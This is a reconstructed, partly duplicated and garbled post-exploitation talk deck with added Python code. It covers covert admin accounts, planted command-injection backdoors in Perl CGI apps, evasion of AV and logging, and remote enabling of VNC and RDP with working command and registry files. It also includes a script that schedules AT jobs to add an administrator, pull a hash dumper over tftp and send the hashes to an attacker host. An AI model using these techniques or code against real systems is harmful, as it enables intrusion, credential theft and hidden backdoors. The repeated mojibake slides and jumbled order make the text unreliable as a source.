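    re.X,
)
INPUT_TAG = re.compile(r"<input\b[^>]*>", re.I)
ATTR = re.compile(r"""\b(type|name)\s*=\s*["']?([^\s"'>]+)""", re.I)

# Constructed CGI script and form: one safe three-arg open, one two-arg open
# with a constant path, the slide's planted sink, and a method-call variant.
CONSTRUCTED_CGI = r"""use CGI;
my $q = CGI->new;
my $lang = $q->param('Lang');                        # value of the hidden field
open(my $cfg, '<', "/etc/app/$lang.conf") or die;   # three-arg: mode is fixed
open(LOG, ">>/var/log/app.log");                     # two-arg, but constant path
if (defined $lang) { open($filename, ">$lang") }    # slide 24's planted sink
open(IN, $q->param('file'));                         # path straight from the request
"""
CONSTRUCTED_FORM = ('<form method="POST" action="/cgi-bin/app.cgi">'
                    '<input name="q" type="text">'
                    '<input type="hidden" name="Lang"></form>')


def interpolates(expr):
    """True for a bare scalar/method call or a double-quoted string holding a $var."""
    return expr.startswith("$") or (expr.startswith('"') and "$" in expr)


def scan_perl(source):
    """Return (line_no, snippet) for each two-arg open whose path is interpolated."""
    hits = []
    for no, line in enumerate(source.splitlines(), 1):
        for m in TWO_ARG_OPEN.finditer(line):
            if interpolates(m.group("expr")):
                hits.append((no, m.group(0)))
    return hits


def hidden_fields(html):
    """Names of hidden <input> elements, attribute order independent."""
    names = []
    for tag in INPUT_TAG.findall(html):
        attrs = {k.lower(): v for k, v in ATTR.findall(tag)}
        if attrs.get("type", "").lower() == "hidden" and "name" in attrs:
            names.append(attrs["name"])
    return names


if __name__ == "__main__":
    print("hidden fields:", hidden_fields(CONSTRUCTED_FORM))
    for no, snippet in scan_perl(CONSTRUCTED_CGI):
        print(f"line {no}: {snippet}")
```

The fix on the reviewed side is the three-argument form with an explicit mode and a validated path, which the scanner deliberately does not flag.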
Slide 28
Persistence
• Covert Accounts
  – Add an account / re-enable one
  – Modify local account policies to allow access
    • Ex: SUPPORT_3848576b1, guest
  – Add it to the admin group (net localgroup)
• Only use AT to run your commands
• Persistence without adding files / new accounts
  – Unlikely to be discovered
Slide 29
• DEMOS
Slide 30
Stealth / Evading Detection
Slide 31
Stealth / Evading Detection
• Hiding your activity
  – From:
    • IDS
    • AV
    • LOGGING
    • Suspicious users & admins
    • Firewalls
    • Process listing
Slide 32
Stealth / Evading Detection
• Why Stealth?
  – If you get caught, you get stopped
  – The longer you can operate undetected, the more you can accomplish
  – Admins won't fix problems they don't know exist (helps persistence)
  – On a pen test you should also be testing the organization's detection and response capabilities
Slide 33
Stealth Evading Detection
bull Goalsndash Keep system operable
bull If it breaks you canrsquot use itbull Someone will come fix it
ndash Operate without fear of detectionndash Robustness
bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS
Slide 34
Stealth Evading Detection
bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption
bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics
bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research
Slide 35
Stealth Evading Detection
bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight
bull Many tools have ONLY malicious usesbull Make your intent hard to determine
ndash Be noisy on one to divert attention from another
Slide 36
Stealth Evading Detection
bull Different Perspectivendash Know the targets environment better than
they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal
behavior
ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious
Slide 37
Stealth Evading Detection
bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs
Slide 38
bull DEMOSndash Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
bull Itrsquos not always about ROOTbull Look like someone else
ndash Use the credentials access of another userbull Goals
ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior
Slide 41
User Identity Theft
bull Stages and techniquesndash Target users
bull Who has access to whatbull Where is the data
ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens
ndash Access is the end goal be it data or another system
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 16
A word on Stealth vs Persistence
ndash In the old days a rootkit helped you maintain rootndash Today rootkits are all about hidingndash These two concepts still go hand in hand
Slide 17
Persistence
bull Persistence is maintaining accessbull Why
ndash Targetrsquos can get patchedndash Some exploits are 1 shot onlyndash Sometimes you need to return multiple times to the
targetndash Targetrsquos usefulness not always immediately known
bull Goals Access target as often as neededusefulbull Huge area of studybull Sometimes persistence doesnrsquot matter
Slide 18
Persistence
bull Stages of Persistencendash Initial access
bull Exploitbull Stolen password etc
ndash Decisions What tool to usebull FUZZY ndash OS Environment Target dependent
ndash Setup ndash Re-accessing of targetndash Cleanup Donrsquot be a slob it will get you caught
bull When you no longer need the target leave no trace
Slide 19
Persistence
bull Existing toolsndash Rootkitsndash Backdoorsndash Trojansndash Port knockersndash Adding accountsndash Things like netcat backdoors inetd
modifications process injection stealing credentials etc
Slide 20
Persistence
bull Different perspective on persistencendash If you can always re-exploit who caresndash Inject add modify new vulnerabilities
bull Hard to determine maliciousnessbull We all know its hard to find bugs now
imagine someone is purposefully putting the bugs in
Slide 21
Persistence
bull Leveraging existing persistent admin access
bull Nagios checksbull Attack Configuration Management
ndash Cfenginendash SMSndash Automated Patching Systems (ldquopatchrdquo
them with our trojans)bull GUIrsquos
bull Tool distribution
Slide 22
Persistence
bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version
ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get
detected
Slide 23
Persistence
bull Add vulnerable codebull Example web apps
ndash Take out user input validationndash Inject your vulnerable code
bull Focus on vague intentbull Never be obviously and solely malicious
ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs
Slide 24
Persistence
bull More web app examplesbull Add hidden field to HTML form
ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt
bull Edit web app and tie vuln perl code to form field input
If defined $hidden_field open($filenamerdquogt$hidden_field)
bull Craft a POST including the hidden field
Slide 25
Persistence
bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected
ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period
bull No rootkits to installbull Tripwire probably wonrsquot see this
Slide 26
Persistence
bull Take concept to another levelndash Add a decoder to web appndash Look for a ldquotriggerrdquo string combination in form
fieldsndash If Name = John Smith and Age = 42 then execute
contents of Address fieldndash URL encode form entries containing commandsndash Have identifier ldquostubrdquo in encoded data for app to
find
Slide 27
Persistence
bull Mixing Stealth with Persistencendash Further encodingndash Take entries from all fieldsndash Concat themndash ldquoDecoderdquo commandsndash Rotational Ciphers (rot 13 ceaser)ndash Even more complex obfuscation
Slide 28
Persistence
bull Covert Accountsndash Add an account renablendash Modify local account policies to allow access
bull Ex SUPPORT_3848576b1 guestndash Add it to the admin group (net localgroup)
bull Only use AT to run your commandsbull Persistence without adding files new accounts
ndash Unlikely to be discovered
Slide 29
bull DEMOS
Slide 30
Stealth Evading Detection
Slide 31
Stealth Evading Detection
bull Hiding your activityndash From
bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing
Slide 32
Stealth Evading Detection
bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you
can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist
(helps persistence)ndash On a pen test you should also be testing the
organizations detection and response capabilities
Slide 33
Stealth Evading Detection
bull Goalsndash Keep system operable
bull If it breaks you canrsquot use itbull Someone will come fix it
ndash Operate without fear of detectionndash Robustness
bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS
Slide 34
Stealth Evading Detection
bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption
bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics
bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research
Slide 35
Stealth Evading Detection
bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight
bull Many tools have ONLY malicious usesbull Make your intent hard to determine
ndash Be noisy on one to divert attention from another
Slide 36
Stealth Evading Detection
bull Different Perspectivendash Know the targets environment better than
they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal
behavior
ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious
Slide 37
Stealth Evading Detection
bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs
Slide 38
bull DEMOSndash Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
bull Itrsquos not always about ROOTbull Look like someone else
ndash Use the credentials access of another userbull Goals
ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior
Slide 41
User Identity Theft
bull Stages and techniquesndash Target users
bull Who has access to whatbull Where is the data
ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens
ndash Access is the end goal be it data or another system
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
• Enabling PsExec
  – PsExec was a great, awesome remote shell/command tool
  – Everybody now disables ClipBook, which PsExec requires (l4m3!)
  – Let's re-enable it
Slide 50
Feature Modification
• Enabling PsExec
• Use the service control tool, sc.exe
  – net use \\target\ipc$ password /user:username
  – sc \\target config netdde start= auto
  – sc \\target config netddedsdm start= auto
  – sc \\target config clipsrv start= auto
  – sc \\target start netdde
  – sc \\target start netddedsdm
  – sc \\target start clipsrv
  (the space after "start=" is required by sc's parser; the service name is clipsrv in both the config and start lines)
Slide 51
Feature Modification
• Enabling VNC (from the command line)
  – Go get VNC (check out guhnu)
  – Make a folder on the target for the VNC files
  – Copy the following files to the target folder:
    • winvnc.exe
    • vnc.reg
    • vnchooks.dll
    • omnithread_rt.dll
  – regedit /s vnc.reg
  – winvnc -install
  – net start "vnc server"
  – winvnc
  – Password is "infected"

vnc.reg file contents (regedit silently ignores a .reg file that lacks the header line):

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default]
"SocketConnect"=dword:00000001
"AutoPortSelect"=dword:00000001
"InputsEnabled"=dword:00000001
"LocalInputsDisabled"=dword:00000000
"IdleTimeout"=dword:00000000
"QuerySetting"=dword:00000002
"QueryTimeout"=dword:0000000a
"PollUnderCursor"=dword:00000000
"PollForeground"=dword:00000001
"PollFullScreen"=dword:00000000
"OnlyPollConsole"=dword:00000001
"OnlyPollOnEvent"=dword:00000000
"Password"=hex:10,4d,89,3d,5a,e1,55,f8
Slide 52
Feature Modification
• Enabling Remote Desktop remotely
  – Having a GUI to your target can be necessary
  – Maybe they are running a specialized GUI app
    • Ex: a system controlling access to security doors
      – No command-line way of modifying the system; you need the GUI
    • SCADA systems
    • Security cameras
    • Who knows what you might be up to
  – Remote Desktop is fast and already a feature of the OS
  – However, it's often disabled, maybe even by GPO
Slide 53
Feature Modification
• Enabling Remote Desktop remotely
  – Complicated procedure, especially if GPOs are involved
  – Create a file named fix_ts_policy.ini:

[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Privilege Rights]
SeRemoteInteractiveLogonRight = hacked_account
SeInteractiveLogonRight = hacked_account
SeDenyInteractiveLogonRight =
SeDenyRemoteInteractiveLogonRight =
SeDenyNetworkLogonRight =

  – This file will fix the policy settings that are in your way
  – Change "hacked_account" to a real account
  – Caveat: a [Privilege Rights] line replaces the entire assignment list for that right, so as written it strips SeInteractiveLogonRight from Administrators, Users and everyone else on the box. Append the existing principals (*S-1-5-32-544 for Administrators, for example) if the host has to keep working.
Slide 54
Feature Modification
• Enabling Remote Desktop remotely
  – Create another file named enable_ts.reg:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
"TSEnabled"=dword:00000001
"TSUserEnabled"=dword:00000000

  – Then perform these commands:
    • sc config termservice start= auto
    • regedit /s enable_ts.reg
    • copy c:\windows\security\database\secedit.sdb c:\windows\security\database\new.secedit.sdb
    • copy c:\windows\security\database\secedit.sdb c:\windows\security\database\orig.secedit.sdb
    • secedit /configure /db new.secedit.sdb /cfg fix_ts_policy.ini
    • gpupdate /force
    • net start "terminal services"
  – Caveat: secedit /configure changes local policy only. Rights that a domain GPO defines are re-applied at the next policy refresh (which gpupdate /force triggers) and override the local change, so verify the effective setting afterwards (secedit /export /cfg out.inf, or simply attempt the RDP logon).
Slide 55
• DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
• Old-school techniques can get results on new problems
• Remember, this is POST-exploitation, so you already have some access
• The AT command schedules things to run at a specified time and date
  – The Schedule service must be running
Slide 58
Abusing The Scheduler
• Often these days certain features are disabled for security
  – ClipBook, shares, enumeration
• Use AT to get around these problems
  – Usually NOT disabled

net use \\target\ipc$ password /user:username
at \\target 12:00 pm command
Ex: at \\192.168.1.1 12:00pm tftp -i myip GET nc.exe

(AT reaches the remote Schedule service over the same authenticated SMB session, so the net use has to succeed first; tftp -i selects binary mode, which an .exe needs)
Slide 59
Abusing The Scheduler
• Often AT is still enabled while many other things you typically use are not
• AT is as good as having a shell
  – Enable/start services
  – Transfer files
  – Add users
  – Mess with the registry/policies
  – Pretty much anything you can do with a shell
  – Added bonus: defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
• Building a tool around AT: flow
  • Establish an authenticated session
  • Determine the time on the target
  • Pass commands to the target to be run 1 min from now
    – Write a batch file that executes everything at once
    – Have the target send you back whatever info you want
    – Be mindful of file transfer protocols; TFTP is good but not always "quiet" or available
Slide 61
Abusing The Scheduler
• Common use example
  – net use \\target
  – net time \\target
  – at \\target (net time + 1 min) "tftp -i myip GET e.bat"
  – at \\target (net time + 2 min) e.bat
  – e.bat does:
    • Adds a user (net user hacked hacked /add)
      – Admin group (net localgroup administrators hacked /add)
    • Gets hash-dumping tools and dumps hashes
    • Sends hashes, identified by IP, back to the attacker host
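The AT flow on slides 60 and 61, worked through as an added Python example (this is not the authors' AtAbuse tool): it parses the target's clock out of a constructed `net time` reply, schedules the TFTP pull one minute ahead on the target's clock and the batch file a minute after that, and writes an e.bat equivalent. Commands are returned as strings rather than run, so the scheduling logic can be checked offline; the attacker address, account names and the hash-dumper file name are assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed sample of a `net time \\host` reply (XP/2003, US locale).
SAMPLE_NET_TIME = (
    "Current time at \\\\192.168.1.1 is 1/15/2008 11:58 AM\r\n"
    "The command completed successfully.\r\n"
)

# US-locale layout only; other locales print the date differently.
NET_TIME_RE = re.compile(r"is (\d{1,2}/\d{1,2}/\d{4} \d{1,2}:\d{2} [AP]M)")


def parse_net_time(output):
    """Return the target's clock as a datetime; raise if the reply is not recognized."""
    m = NET_TIME_RE.search(output)
    if not m:
        raise ValueError("unrecognized net time output: %r" % output)
    return datetime.strptime(m.group(1), "%m/%d/%Y %I:%M %p")


def at_time(target_now, minutes_ahead):
    """HH:MM argument for AT, computed from the target's clock, not ours.

    AT has minute granularity and a job set for the current minute is skipped,
    so callers must schedule at least one minute ahead. A time past midnight is
    fine: AT without /every or /next runs at the next occurrence of HH:MM.
    """
    if minutes_ahead < 1:
        raise ValueError("AT cannot run a job in the current minute")
    return (target_now + timedelta(minutes=minutes_ahead)).strftime("%H:%M")


def build_batch(target_ip, attacker_ip, user, password, dumper="hashdump.exe"):
    """Contents of the e.bat payload: add a local admin, fetch a hash dumper,
    dump, push the result back named after the target, then clean up.
    'hashdump.exe' is a placeholder name, not a specific tool."""
    lines = [
        "@echo off",
        f"net user {user} {password} /add",
        f"net localgroup administrators {user} /add",
        f"tftp -i {attacker_ip} GET {dumper}",
        f"{dumper} > hashes.txt",
        # The file name carries the target IP so results from many hosts stay apart.
        f"tftp -i {attacker_ip} PUT hashes.txt {target_ip}.txt",
        f"del hashes.txt {dumper}",
        "del e.bat",
    ]
    return "\r\n".join(lines) + "\r\n"


def build_sequence(target_ip, attacker_ip, net_time_output,
                   session_user, session_password, user="hacked", password="hacked"):
    """Commands to type on the attacker side, in order, plus the batch body."""
    now = parse_net_time(net_time_output)
    cmds = [
        f"net use \\\\{target_ip}\\ipc$ {session_password} /user:{session_user}",
        # Job 1: pull the batch file into %SystemRoot%\system32, AT's working directory.
        f'at \\\\{target_ip} {at_time(now, 1)} "tftp -i {attacker_ip} GET e.bat"',
        # Job 2: run it a minute later (cmd /c, as AT asks for with non-.exe commands).
        f"at \\\\{target_ip} {at_time(now, 2)} cmd /c e.bat",
    ]
    return cmds, build_batch(target_ip, attacker_ip, user, password)


if __name__ == "__main__":
    cmds, batch = build_sequence("192.168.1.1", "10.0.0.5", SAMPLE_NET_TIME, "admin", "Passw0rd")
    print("\n".join(cmds))
    print(batch)
```

Two things to watch when doing this for real: the `net time` layout is locale dependent (the regex above only knows the US form), so check the reply before trusting the parse; and the jobs are timed against the target's clock, not yours, which is the whole reason the `net time` step exists.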
Slide 62
Abusing The Scheduler
• Privileges of LocalSystem that we care about
  – NT AUTHORITY\SYSTEM and BUILTIN\Administrators SIDs
  – SE_IMPERSONATE_NAME
  – SE_TCB_NAME
  – SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
• Automating techniques and tools for use against massive numbers of hosts
• Goals
  – Penetrate as many systems as possible with little interaction and in a short time
  – Ease of use/re-use
  – Lower cost of attack
Slide 65
Massive Automation
• MassNetUse: establish NetBIOS session credentials on a range of hosts
• MassWinenum: enumerate NetBIOS information, bypass certain RestrictAnonymous settings
• AtAbuse: use the scheduler as your "shell" to control ranges of hosts
Slide 66
• DEMOS
Slide 67
• Related talks you should see
  – Beyond EIP: the theoretical tool-development end of things (spoonm & skape)
  – Security Implications of Windows Access Tokens (Luke Jennings)
Slide 68
• Acknowledgements
  – Thanks to:
    • All the people from the offensivecomputing, nologin and uninformed IRC and SILC channels
    • HD Moore, especially, for support and mentorship
    • Danny Quist, krbklepto, Egypt, spoonm, skape
    • Luke Jennings for his awesome work
Slide 69
• Questions?
• Presentation available at www.offensivecomputing.net
Slide 17
Persistence
• Persistence is maintaining access
• Why?
  – Targets can get patched
  – Some exploits are one-shot only
  – Sometimes you need to return multiple times to the target
  – A target's usefulness is not always immediately known
• Goal: access the target as often as needed/useful
• Huge area of study
• Sometimes persistence doesn't matter
Slide 18
Persistence
• Stages of persistence
  – Initial access
    • Exploit
    • Stolen password, etc.
  – Decisions: what tool to use?
    • FUZZY: OS, environment and target dependent
  – Setup
  – Re-accessing the target
  – Cleanup: don't be a slob, it will get you caught
    • When you no longer need the target, leave no trace
Slide 19
Persistence
• Existing tools
  – Rootkits
  – Backdoors
  – Trojans
  – Port knockers
  – Adding accounts
  – Things like netcat backdoors, inetd modifications, process injection, stealing credentials, etc.
Slide 20
Persistence
• Different perspective on persistence
  – If you can always re-exploit, who cares?
  – Inject/add/modify new vulnerabilities
    • Hard to determine maliciousness
    • We all know it's hard to find bugs now; imagine someone purposefully putting the bugs in
Slide 21
Persistence
• Leveraging existing persistent admin access
  • Nagios checks
  • Attack configuration management
    – Cfengine
    – SMS
    – Automated patching systems ("patch" them with our trojans)
  • GUIs
  • Tool distribution
Slide 22
Persistence
• Example
  • Machine has VNC installed
  • Replace the installed VNC with a vulnerable version
    – Authentication bypass
  • Copy the registry password so the target doesn't realize
  • Persistence with no backdoors or rootkits to get detected
Slide 23
Persistence
• Add vulnerable code
• Example: web apps
  – Take out user input validation
  – Inject your vulnerable code
• Focus on vague intent
• Never be obviously and solely malicious
  – Look for apps with previous vulnerabilities
  – Re-introduce patched bugs
Slide 24
Persistence
• More web app examples
• Add a hidden field to an HTML form
  – Users detect no change, the app performs normally
    <input type="hidden" name="Lang">
• Edit the web app and tie vulnerable Perl code to the form field input
    if (defined $hidden_field) { open($filename, ">$hidden_field"); }
• Craft a POST including the hidden field
Slide 25
Persistence
• www.target.com/cgi-bin/app.cgi?lang=|cmd|
• The code will execute your commands
• Who needs to bind a shell to a port?
• Unlikely to ever be detected
  – Especially good in big apps
  – Code review can't even be sure of maliciousness
  – Some sites replace code every X time period
• No rootkits to install
• Tripwire probably won't see this
Slide 26
Persistence
• Take the concept to another level
  – Add a decoder to the web app
  – Look for a "trigger" string combination in form fields
  – If Name = John Smith and Age = 42, then execute the contents of the Address field
  – URL-encode form entries containing commands
  – Have an identifier "stub" in the encoded data for the app to find
Slide 27
Persistence
• Mixing stealth with persistence
  – Further encoding
  – Take entries from all fields
  – Concat them
  – "Decode" commands
  – Rotational ciphers (rot13, Caesar)
  – Even more complex obfuscation
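The trigger-plus-decoder backdoor from slides 26 and 27, as an added Python example rather than the authors' code: a request is treated as ordinary unless the trigger fields match exactly, every field value is URL-decoded and concatenated in submission order, and the rot13 command sitting between two copies of a marker stub is recovered even when it is split across fields. The attacker side that builds such a request is included so the two halves can be checked against each other. The stub value, the field names and the sample POST bodies are constructed for the example; a real backdoor would hand the returned string to the shell, which is deliberately left out here.

```python
import codecs
from urllib.parse import parse_qsl, urlencode

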